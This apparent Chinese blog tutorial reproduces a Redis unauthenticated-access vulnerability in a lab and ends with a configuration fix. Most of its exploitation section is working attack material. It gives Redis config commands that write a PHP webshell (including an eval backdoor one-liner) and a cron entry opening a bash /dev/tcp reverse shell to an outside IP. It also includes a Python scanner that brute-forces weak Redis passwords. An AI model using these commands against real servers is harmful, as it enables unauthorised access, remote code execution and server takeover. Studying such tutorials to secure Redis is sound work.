Redis未授权访问漏洞复现与利用

漏洞简介

Redis默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身的提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器。

漏洞的产生条件有以下两点:

  • redis绑定在 0.0.0.0:6379,且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略,直接暴露在公网;
  • 没有设置密码认证(一般为空),可以免密码远程登录redis服务。

漏洞危害

  • 攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
  • 攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;
  • 如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器

漏洞环境搭建

靶机环境搭建

centos7搭建redis数据库服务
注意

  • 配置redis服务环境变量
cp -r /redis-4.0.6/src /usr/local/
//启动redis-server和redis-cli不用每次进入安装目录(类似配置环境变量)
  • 复制/redis-4.0.6/redis.conf到/etc/
  • 配置/etc/redis.conf
# bind 127.0.0.1
protected-mode no

攻击机环境搭建

攻击机环境搭建

redis常用命令

redis-cli -h host -p port -a password//登陆
ping //PONG返回响应是否连接成功
echo //在命令行打印一些内容
info //返回redis的相关信息
config get dir/* //实时传储收到的请求
flushall //删除所有数据库中的数据库

redis常用命令

漏洞复现

上传webshell

config set dir /var/www/html/
config set dbfilename redis.php
set webshell "<?php phpinfo(); ?>"
//set webshell "<?php @eval($_POST['cmd']); ?>"//上传一句话php木马
save



nc反弹shell

  • 利用cron反弹shell
redis-cli -h 192.168.0.104
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.2.130/6666 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save

  • 攻击机利用nc监听6666端口
nc -lvp 666

利用"公私钥"认证获取root权限

复现链接

POC

python2 redis未授权访问.py 192.168.2.147 6379

#coding=utf-8
#可用来测试是否存在未授权或弱口令的情况:
#! /usr/bin/env python
# _*_  coding:utf-8 _*_
import socket
import sys
PASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']
def check(ip, port, timeout):
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, int(port)))
        s.send("INFO\r\n")
        result = s.recv(1024)
        if "redis_version" in result:
            return u"未授权访问"
        elif "Authentication" in result:
            for pass_ in PASSWORD_DIC:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((ip, int(port)))
                s.send("AUTH %s\r\n" %(pass_))
                result = s.recv(1024)
                if '+OK' in result:
                    return u"存在弱口令,密码:%s" % (pass_)
    except Exception, e:
        pass
if __name__ == '__main__':
    ip=sys.argv[1]
    port=sys.argv[2]
    print check(ip,port, timeout=10)

漏洞修复

1、将redis.conf改成如下配置

bind 127.0.0.1
protected-mode yes


2、poc验证

python2 redis未授权访问.py 192.168.2.147 6379

参考链接

CSDN-Redis未授权访问漏洞复现
CSDN-Redis未授权访问漏洞利用总结
CSDN-Redis下载及安装(windows版)
CSDN-10.Redis未授权访问漏洞复现与利用
cnblogs-10.Redis未授权访问漏洞复现与利用

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

posted @ 2020-06-01 13:05  renblog  阅读(985)  评论(0编辑  收藏  举报